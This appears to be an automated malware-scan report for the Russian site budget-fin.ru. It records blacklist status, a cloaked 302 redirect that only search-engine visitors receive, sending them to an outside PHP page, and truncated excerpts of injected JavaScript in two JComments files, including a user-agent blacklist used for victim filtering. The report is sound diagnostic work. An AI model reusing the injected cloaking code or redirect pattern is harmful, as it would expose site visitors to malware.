Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=budget-fin.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://budget-fin.ru/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
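Malicious/Suspicious Redirects
The request below imitates a visitor arriving from a search engine (note the Referer header). The server answers with a 302 redirect to a different host, while the same URL returns 200 OK and is rated clean in the "Scanned pages/files" table, which suggests the redirect is served only to search-engine traffic.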
Request | Server response | Status |
URL: http://www.budget-fin.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.budget-fin.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 24 Sep 2014 08:35:26 GMT Location: http://www.cieesc.com/includes/domit/1.php Server: Apache/2.2.8 (Fedora) Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.2.4 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.budget-fin.ru/ | 200 OK Content-Length: 10210 Content-Type: text/html | clean |
http://budget-fin.ru/components/com_jcomments/js/jcomments-v2.0.js | 200 OK Content-Length: 28003 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The scanner shows only the start and the end of the file; the middle is cut where marked. The opening block (stripos, zzz_check_ua) is identical to the one reported for ajax.js below, which suggests the same code was injected at the top of both files; the tail appears to be the original JComments script.
(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firef
[... excerpt truncated by the scanner ...]
}}, subscribe: function(o,g){return this.ajax('JCommentsSubscribe',arguments);}, unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);}, updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} };
Antivirus reports:
http://budget-fin.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 5548 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The scanner shows only the start and the end of the file; the middle is cut where marked. The opening block (stripos, zzz_check_ua) is identical to the one reported for jcomments-v2.0.js above, which suggests the same code was injected at the top of both files. The tail, including its eval calls, appears to belong to the original joomlatune AJAX library rather than to the injected block.
(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firef
[... excerpt truncated by the scanner ...]
switch(cmd) { case 'as': if(obj){eval("obj."+property+"=data;");} break; case 'al': if(data){alert(data);} break; case 'js': if(data){eval(data);} break; default: this.error('Unknown command: ' + cmd);break; } } delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; }; this.error = function(){}; } var jtajax = new jtAJAX(); }
Antivirus reports:
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/javascript | clean |
https://scounter.rambler.ru/top100.jcn?1634936 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://www.budget-fin.ru/index.php?option=com_content&task=view&id=12&Itemid=30 | 200 OK Content-Length: 9573 Content-Type: text/html | clean |
http://www.budget-fin.ru/index.php?option=com_content&task=view&id=30&Itemid=50 | 200 OK Content-Length: 6980 Content-Type: text/html | clean |
http://www.budget-fin.ru/scripts/bf_conference.pl?cmd=conf&cid=49 | 200 OK Content-Length: 27412 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://www.budget-fin.ru/test404page.js | 404 Not Found Content-Length: 290 Content-Type: text/html | clean |
http://www.budget-fin.ru/index.php | 200 OK Content-Length: 10210 Content-Type: text/html | clean |
http://www.budget-fin.ru/index.php?option=com_content&task=view&id=13&Itemid=34 | 200 OK Content-Length: 8064 Content-Type: text/html | clean |
http://www.budget-fin.ru/index.php?option=com_content&task=view&id=18&Itemid=37 | 200 OK Content-Length: 7302 Content-Type: text/html | clean |
http://www.budget-fin.ru/download/analiz_nbnf.doc | 200 OK Content-Length: 300914 Content-Type: application/msword | clean |
http://www.budget-fin.ru/download/analiz_nbnf.rar | 200 OK Content-Length: 286953 Content-Type: text/plain | clean |